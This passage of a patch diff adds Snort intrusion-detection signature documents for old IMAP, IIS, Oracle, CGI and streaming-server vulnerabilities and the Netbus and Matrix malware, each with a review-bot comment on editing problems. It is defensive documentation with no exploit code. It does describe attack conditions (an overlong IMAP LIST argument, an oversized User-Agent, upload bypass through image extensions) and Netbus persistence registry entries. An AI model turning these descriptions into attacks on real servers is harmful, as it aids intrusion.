+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
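Review bot: This document has no Affected Systems section, unlike the other signature documents in this patch; add one covering web servers that permit command execution through a URI, which is what Detailed Information describes. Summary ("A web command execution attack involving the use of a "traceroute" command") is a sentence fragment with no period; "none known" under False Positives and False Negatives is lowercase where every other document uses "None known."; and in Corrective Action "outside of it's designated web root" should be "its" (or "their", to agree with "Webservers"), while the first paragraph is a run-on that should be split before "also investigate the server logs".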
--- /dev/null
+++ b/doc/signatures/1845.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1845
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP LIST
+command with a malformed and overly long argument to an internal IMAP
+server port. This may indicate an attempt to exploit a buffer overflow
+vulnerability in the IMAP LIST command. This may also affect other IMAP
+server implementations.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a LIST command with an overly long argument is sent to a vulnerable
+IMAP server, a buffer overflow condition may occur. This can allow an
+attacker to execute arbitrary code from the command shell. Note that
+this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LIST command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system. 
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
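Review bot: Affected Systems reads "University of Washington imapd versions 10.234 or 12.264."; if both versions are affected this should be "and", and the Summary's "This may also affect other IMAP server implementations" should either name them or be removed, since only UW imapd is listed. Additional References is empty although Corrective Action refers to "the patch for your current version of imapd"; add the advisory that patch comes from. The line "operating system. " in Corrective Action carries trailing whitespace.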
--- /dev/null
+++ b/doc/signatures/967.txt
@@ -0,0 +1,73 @@
+Rule:
+--
+Sid:  
+967
+
+--
+Summary:  
+dvwssr.dll is a component installed with Windows NT Option Pack 4.0, 
+Personal Web Server for Windows 95 and 98 and Front Page 98 Server 
+Extensions. This component is vulnerable to a buffer overflow which 
+may allow for the execution of arbitrary code that would run in the 
+context of the system account.
+
+--
+Impact:
+Serious. Execution of arbitrary code and Denial of Service (DoS).
+
+--
+Detailed Information:  
+As with an abundance of other exploits related to Microsoft's Internet 
+Information Services and web server based implementations, it is 
+possible for an attacker to run code of choice against the vulnerable 
+web server.  It is also possible to use this exploit to stop the remote 
+server from responding which would result in a DoS.
+
+--
+Attack Scenarios:  
+   
+
+--
+Ease of Attack:  
+This attack would require for both the dvwssr.dll file to reside on the 
+web server and for the correct permissions to be in place in order for 
+the attack to be successful.  Using a script to send continued requests 
+for the file dvwssr.dll would make a denial of service attack fairly 
+easy.
+
+--
+False Positives:  
+Web requests or web based applications which use dvwssr.dll in a context
+which in not malicious in nature.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:  
+Remove dvwssr.dll from the web server and test all necessary 
+functionality.  See additional references for more information.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Chris Arsenault	<carsenault@firstedcu.org> and Josh Gray
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+--
+Additional References:
+
+Security Focus BugTraq ID
+http://www.securityfocus.com/bid/1109
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260
+
+Microsoft ms00-025
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms00-025.asp
+ 
+
+--
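Review bot: The Attack Scenarios section is empty (the line after "Attack Scenarios:" contains only spaces); either describe the scenario or remove the heading. There is also no Affected Systems section, although Summary names the affected products (Windows NT Option Pack 4.0, Personal Web Server for Windows 95 and 98, Front Page 98 Server Extensions); move that list into an Affected Systems section. In False Positives, "in a context which in not malicious" should be "which is not malicious". In Contributors, a tab separates "Chris Arsenault" from the address where the other entries use a single space, and the "+ " line before the final "--" contains only a space.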
--- /dev/null
+++ b/doc/signatures/2840.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2840
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_snapshot_propagation
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
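Review bot: The lines "vulnerability in the procedure alter_snapshot_propagation" and ". This procedure is included in" have a line break before the period; join them as "vulnerability in the procedure alter_snapshot_propagation. This procedure is included in sys.dbms_repcat_sna_utl." Affected Systems "Oracle Oracle9i" duplicates the vendor name. Corrective Action ("Apply the appropriate vendor supplied patch") lacks a period, and Additional References is empty; add the vendor alert covering this package.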
--- /dev/null
+++ b/doc/signatures/1849.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1849
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
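Review bot: Summary, Affected Systems ("All systems using a web server.") and Detailed Information ("the attack scenarios are legion") give no indication of which web server or application vulnerability sid 1849 matches; name it so the document is useful for triage. "attackers choosing" in Impact should be "attacker's choosing", and "Web server" / "web server" capitalization is inconsistent within the first Detailed Information paragraph.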
--- /dev/null
+++ b/doc/signatures/481.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+481
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running TJPingPro 1.1 Build 2 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running TJPingPro 1.1 Build 2 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS167
+
+--
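Review bot: "legimately" under False Positives should be "legitimately". In Contributors, "Steven Alexander<alexander.s@mccd.edu>" is missing a space before the address, and Max Vision's address is given as vision@whitehats.org here but vision@whitehats.com in other documents in this patch; pick one. Corrective Action ("Block inbound ICMP echo requests.") is broader than the finding; consider noting that this also removes the legitimate troubleshooting use acknowledged under False Positives, so the block may be better applied selectively at the perimeter.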
--- /dev/null
+++ b/doc/signatures/1543.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1543
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
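Review bot: The body of this file is identical to 1480.txt apart from the Sid, so it inherits the same problems: Summary and Affected Systems do not name the CGI script sid 1543 matches, "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing" (Impact and Detailed Information), and the line "relationships between the victim server and other hosts can be exploited by the attacker." exceeds the wrap width used elsewhere. If the two rules match different scripts, each document should say which one.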
--- /dev/null
+++ b/doc/signatures/734.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+734
+
+--
+Summary:
+This event is generated when Matrix worm activity is detected.
+
+--
+Impact:
+Severe - Windows system files can be deleted/replaced/infected 
+(Wsock32.dll, Explorer.exe and Rundll32.exe). 
+
+The virus propagation is done when a user sends e-mail, but variants may
+exist that display other characteristics.
+
+--
+Detailed Information:
+Matrix worm is distributed via e-mail when a user sends some e-mail to a recipient. The attachement name is random. File suffixes can be .exe, .com, .bat, .pif, .scr, .jpg.pif.. etc. The worm code uses plugins which can make the virus really dangerous (e.x. installing backdoors). Removal could be difficult, but free removal tools exist (see below).
+
+--
+Attack Scenarios:
+An attacker sends the Matrix worm using a MIME exploit which executes the virus code automatically. The worm can now distribute itself using the mail client of the user and can install backdoors and infect EXE files.
+
+--
+Ease of Attack:
+Simple. The worm does all the distribution work.
+
+--
+False Positives:
+E-Mail that contains the body "Software provide by [MATRiX]"
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Symantec W95.MTX removal tool: http://www.sarc.com/avcenter/venc/data/w95.mtx.fix.tool.html
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+
+
+--
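Review bot: "free removal tools exist (see below)" in Detailed Information points at an Additional References section that is empty; the Symantec removal tool URL sits under Corrective Action instead, so either move it to Additional References or change "see below" to "see Corrective Action". "attachement" should be "attachment", "e.x." should be "e.g.", and ".jpg.pif.. etc." has a stray period. There is no Affected Systems section; since Impact names Windows system files (Wsock32.dll, Explorer.exe, Rundll32.exe), Windows systems should be listed there.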
--- /dev/null
+++ b/doc/signatures/1275.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1275
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) yppasswd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port yppasswd is using.  Attackers can also learn what versions of the yppasswd protocol are accepted by yppasswd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as yppasswd run.  The yppasswd RPC service handles password change requests from the program yppasswd.  This program is used to change a user password in Network Information Service (NIS) environments where a centralized database exists to distribute passwords throughout a network.  Multiple vulnerabilities are associated with the yppasswd RPC program.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where yppasswd runs.  This may be a precursor to querying yppasswd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access yppasswd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for yppasswd, not probes of the yppasswd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the yppasswd service itself. An attacker may attempt to go directly to the yppasswd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS14
+
+
+--
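Review bot: Attack Scenarios says the GETPORT query "may be a precursor to querying yppasswd for usage statistics", but Detailed Information describes yppasswd as the service that "handles password change requests", not statistics; this sentence appears to have been copied from another RPC document and should instead describe a precursor to attacks on the password change service (Detailed Information already notes "Multiple vulnerabilities are associated with the yppasswd RPC program"). "Ease of Attack: Easy." differs from the "Simple." used in every other document, and "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" is ambiguous about direction; suggest "access from external sources to RPC-enabled machines is denied".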
--- /dev/null
+++ b/doc/signatures/100000517.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000517
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "e107" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "ep" parameter in the "search.php" script used 
+by the "e107" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using e107
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
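Review bot: Impact and the second Detailed Information paragraph reuse the remote file include boilerplate ("administrative access to the server", "execute system binaries or malicious code of the attackers choosing"), which overstates a cross site scripting issue in the "ep" parameter of "search.php"; describe the XSS impact instead (script execution in the victim's browser, theft of session data), which Attack Scenarios already implies with "steal information from a user clicking on that link". "attackers choosing" should be "attacker's choosing", and a blank line is missing before the "--" that follows "All systems running CGI applications using e107".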
--- /dev/null
+++ b/doc/signatures/2077.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2077
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Momabo Site Server.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
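Review bot: Summary says "Momabo Site Server" while Detailed Information and Affected Systems say "Mambo"; fix the typo. The Ease of Attack section is empty; fill it in, since Attack Scenarios implies the attack only requires uploading a file with an image extension appended. "laxe checking" should be "lax checking", and "Mambo Mambo Site Server" repeats the vendor name.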
--- /dev/null
+++ b/doc/signatures/110.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+110
+
+--
+Summary:
+Netbus is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine. This Trojan also has the ability to scan machines and networks for open ports, it can also redirect legitimate traffic to other destinations. It can turn the infected host into an open proxy server.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Netbus sever to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	109	netbus active (outgoing TCP connection)
+	110	netbus getinfo (incoming TCP connection)
+	115	netbus active (outgoing TCP connection)
+
+Server ports usually opened may be one of the following depending on the version of netbus: 12345, 12346, 20034
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+The manual removal of this Trojan should only be attempted by an experienced Windows system administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+
+Registry keys added include:
+
+	Netbus Server Pro
+	PATCH "C:\windows\patch.exe /nomsg" - note: the entry may not necessarily be called PATCH
+	NetBuster = ""
+	SysCopy = "command /c copy %windir%\\keyhook.dl_ %windir%\\*.dll /Y"
+	Rundll32 = "rundll.dl_ /noadd"
+	Rundll = "regedit /s nbsetup2.reg"
+
+Later versions may also add one of these registry entries:
+
+	HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/
+	HKEY_CURRENT_USER/NetBus Server/
+
+These entries should be deleted.
+
+The files rundll.dl_ (note the underscore, this is important) and nbsetup2.reg should be deleted if they exist.
+
+Ending the process is necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS401
+http://www.whitehats.com/info/IDS403
+
+Hackfix.org
+http://www.hackfix.org/netbusfix/index.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/netbus/index.html
+
+--
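Review bot: Summary ("Netbus is a Trojan Horse.") does not say what sid 110 matches; the SID table in Detailed Information gives "110 netbus getinfo (incoming TCP connection)", so Summary should state that the event is generated when a Netbus client sends a getinfo request to a host. In that table, sids 109 and 115 carry the identical message "netbus active (outgoing TCP connection)", which looks like a copy error. "Netbus sever" should be "Netbus server". The keys under "Later versions may also add one of these registry entries" use forward slashes (HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/...) while the earlier keys use backslashes; use backslashes throughout. The operating system list in Detailed Information belongs in an Affected Systems section, which this document lacks, and Corrective Action opens with a stray blank line.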
--- /dev/null
+++ b/doc/signatures/100000674.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000674
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "footer.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "footer.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
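Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host...") is generic credential-validation boilerplate that says nothing about a remote file include and carries the typo "ona"; replace it with a sentence on how the URL passed in "theme_root" is fetched and executed by "footer.php". The Summary's "an exploitation attempt has been attempted" is redundant; "may indicate an exploitation attempt" is enough. Corrective Action could add the PHP-side mitigation of disabling allow_url_include (and allow_url_fopen where practical) next to patching. Additional References is empty for a vulnerability in a named product. Layout differs from the other files: no blank line between "100000674" and "--", and none after "All systems running CGI applications using Harpia".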
--- /dev/null
+++ b/doc/signatures/374.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+374
+
+--
+
+Summary:
+This event is generated when an ICMP echo request is made from a MacIntosh host running IPNetMonitor.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a MacIntosh host running IPNetMonitor contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS157
+
+--
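Review bot: "MacIntosh" in Summary and Detailed Information should be "Macintosh", and "legimately" in False Positives should be "legitimately". Detailed Information says the echo request "contains a unique payload" but never says what it is, so the reader cannot judge the False Positives entry; describe or quote the payload bytes the rule keys on. Corrective Action "Block inbound ICMP echo requests." is a blunt remedy for an information-gathering event and breaks the legitimate troubleshooting that the False Positives section itself acknowledges; "Block or rate-limit inbound ICMP echo requests at the perimeter where policy permits." would be more defensible.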
--- /dev/null
+++ b/doc/signatures/2442.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2442
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Apple Quicktime/Darwin Streaming Server.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+The Apple Quicktime Streaming Server is used to serve client machines
+with streaming media content using TCP/IP. A vulnerability exists in the
+processing of client requests that can cause a DoS.
+
+An overly long User-Agent field in DESCRIBE requests to the server can
+cause this condition to occur.
+
+--
+Affected Systems:
+	Apple Darwin Streaming Server 4.1.3
+	Apple Quicktime Streaming Server 4.1.3
+
+--
+Attack Scenarios:
+An attacker can supply a user agent field in excess of 255 characters in
+a DESCRIBE request to trigger the DoS condition.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
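Review bot: Ease of Attack "Moderate." does not match Attack Scenarios, which says the condition is triggered by "a user agent field in excess of 255 characters in a DESCRIBE request"; that needs no special tooling, so "Simple." is the rating this patch uses for comparable cases. Additional References is empty although this is a specific, versioned vendor bug (Darwin/QuickTime Streaming Server 4.1.3); add the Apple advisory or Bugtraq/CVE entry. Detailed Information should name the protocol carrying the DESCRIBE request (RTSP) and the port the rule inspects; "using TCP/IP" tells the analyst nothing about where to look. The vendor spells the product "QuickTime".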
--- /dev/null
+++ b/doc/signatures/1307.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1307
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
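Review bot: the Summary and Detailed Information never identify which CGI script or URI this rule matches, so the document cannot help an analyst triage the event; name the request the rule looks for (or state that it is a generic URI pattern) and add a reference in the empty Additional References section. Typo "ona web server" in Detailed Information. The paragraph about validating "credentials of a client host" is unrelated to the input-validation flaw the Impact section describes and appears verbatim in several other files of this patch; trim it to what this rule actually detects.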
--- /dev/null
+++ b/doc/signatures/2830.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2830
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
